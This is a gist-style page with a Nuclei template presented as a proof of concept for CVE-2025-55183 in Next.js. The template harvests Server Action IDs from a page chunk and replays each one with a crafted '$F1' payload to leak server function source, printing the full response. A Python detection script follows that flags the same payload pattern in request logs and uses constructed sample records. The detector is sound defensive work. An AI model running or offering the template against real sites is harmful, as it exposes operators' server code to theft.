@bolhasec
Created December 12, 2025 21:55
POC for CVE-2025-55183

```yaml
id: CVE-2025-55183
# In my tests, using -debug flag provides better results
info:
  name: Next.js Server Action Introspection
  author: sushicomabacate
  severity: high
  description: |
    Extracts 40 or 42-character Server Action IDs from /_next/static/chunks/app/page.js and invokes them via POST to check for source code leakage.

# Using 'http' protocol handles variable chaining/iteration correctly in Nuclei v3
http:
  - raw:
      # -------------------------------------------------------
      # Phase 1: Extraction
      # -------------------------------------------------------
      - |
        GET /_next/static/chunks/app/page.js HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    extractors:
      - type: regex
        name: action_id
        internal: true
        regex:
          - '([a-f0-9]{40,42})'
        group: 1

  - raw:
      # -------------------------------------------------------
      # Phase 2: Exploitation
      # Nuclei iterates this request for EVERY ID found in Phase 1
      # -------------------------------------------------------
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        next-action: {{action_id}}

        &0=["$F1"]&1={"id":"{{action_id}}","bound":null}

    matchers-condition: and
    matchers:
      # 1. Must be a successful request
      - type: status
        status:
          - 200
      # 2. Must specifically contain "function" (proof of source code leak)
      # If you want to see ALL successful executions (even non-leaks), remove this block.
      - type: word
        part: body
        words:
          - "function"

    extractors:
      # -------------------------------------------------------
      # Display Response
      # -------------------------------------------------------
      - type: regex
        name: leaked_response
        part: body
        regex:
          - "([\\s\\S]+)" # Captures full response body
```
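The template above describes a two-phase pattern: harvest action IDs from the page chunk, then replay each one as a `$F`-style function reference. From the defender's side, the same shape is what a WAF rule or log review should key on. The following is an added detection example, not part of the gist: it takes request records in an assumed dict shape (`client_ip`, `method`, `path`, `headers`, `body`, as a reverse proxy with body logging might emit) and flags requests that carry a `next-action` header whose ID is echoed back as the referenced function in the body, then groups hits per client and notes whether that client also fetched the chunk the IDs come from. The sample records are constructed for the example. Note that a legitimate Server Action call also carries a `next-action` header, so the header on its own is not a signal.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Shape of the action IDs the template extracts (40- to 42-char lowercase hex).
ACTION_ID_RE = re.compile(r"^[a-f0-9]{40,42}$")
# A ["$F<n>"] reference in the form-encoded body, i.e. an argument that points
# at a function reference instead of plain data.
F_REF_RE = re.compile(r'\["\$F\d+"\]')
# The action id echoed inside the JSON blob that the $F reference resolves to.
ECHOED_ID_RE = re.compile(r'"id"\s*:\s*"([a-f0-9]{40,42})"')

# Path the template reads to harvest ids (Phase 1 of the template).
CHUNK_PATH = "/_next/static/chunks/app/page.js"


def _action_id(req: Dict) -> str:
    """Return the next-action header value (case-insensitive lookup) or ''."""
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    return headers.get("next-action", "")


def is_introspection_probe(req: Dict) -> bool:
    """True when a request matches the Phase 2 payload shape from the template.

    The tell is the combination: POST, a well-formed next-action id, a "$F"
    function reference in the body, and that same id echoed as the referenced
    function. Ordinary Server Action calls pass plain JSON arguments.
    """
    if req.get("method", "").upper() != "POST":
        return False
    action_id = _action_id(req)
    if not ACTION_ID_RE.match(action_id):
        return False
    body = req.get("body", "")
    if not F_REF_RE.search(body):
        return False
    echoed = ECHOED_ID_RE.search(body)
    return bool(echoed and echoed.group(1) == action_id)


def probe_sources(requests: List[Dict], min_probes: int = 2) -> Dict[str, dict]:
    """Group probe attempts by client IP.

    Also records whether the same client fetched the page chunk the ids are
    harvested from, which is what the two-phase template does. Only clients
    with at least `min_probes` probes are returned.
    """
    per_client = defaultdict(
        lambda: {"probes": 0, "fetched_chunk": False, "action_ids": set()}
    )
    for req in requests:
        entry = per_client[req.get("client_ip", "?")]
        if req.get("method", "").upper() == "GET" and req.get("path") == CHUNK_PATH:
            entry["fetched_chunk"] = True
        elif is_introspection_probe(req):
            entry["probes"] += 1
            entry["action_ids"].add(_action_id(req))
    return {ip: e for ip, e in per_client.items() if e["probes"] >= min_probes}


# Constructed sample records (hypothetical client IPs and action ids).
ID_A, ID_B, ID_C = "a" * 40, "b" * 42, "c" * 40
SAMPLE_REQUESTS = [
    {"client_ip": "203.0.113.7", "method": "GET", "path": CHUNK_PATH,
     "headers": {}, "body": ""},
    {"client_ip": "203.0.113.7", "method": "POST", "path": "/",
     "headers": {"next-action": ID_A,
                 "Content-Type": "application/x-www-form-urlencoded"},
     "body": '0=["$F1"]&1={"id":"' + ID_A + '","bound":null}'},
    {"client_ip": "203.0.113.7", "method": "POST", "path": "/",
     "headers": {"Next-Action": ID_B,  # mixed-case header name
                 "Content-Type": "application/x-www-form-urlencoded"},
     "body": '0=["$F1"]&1={"id":"' + ID_B + '","bound":null}'},
    # Legitimate Server Action call: has the header, but plain JSON arguments.
    {"client_ip": "198.51.100.4", "method": "POST", "path": "/",
     "headers": {"next-action": ID_C, "Content-Type": "text/plain;charset=UTF-8"},
     "body": '["hello"]'},
]

if __name__ == "__main__":
    for ip, info in probe_sources(SAMPLE_REQUESTS).items():
        print(ip, info["probes"], "probes, fetched chunk:", info["fetched_chunk"])
```

In the sample set, only the client that fetched the chunk and then replayed two harvested ids is reported; the ordinary action invocation is left alone.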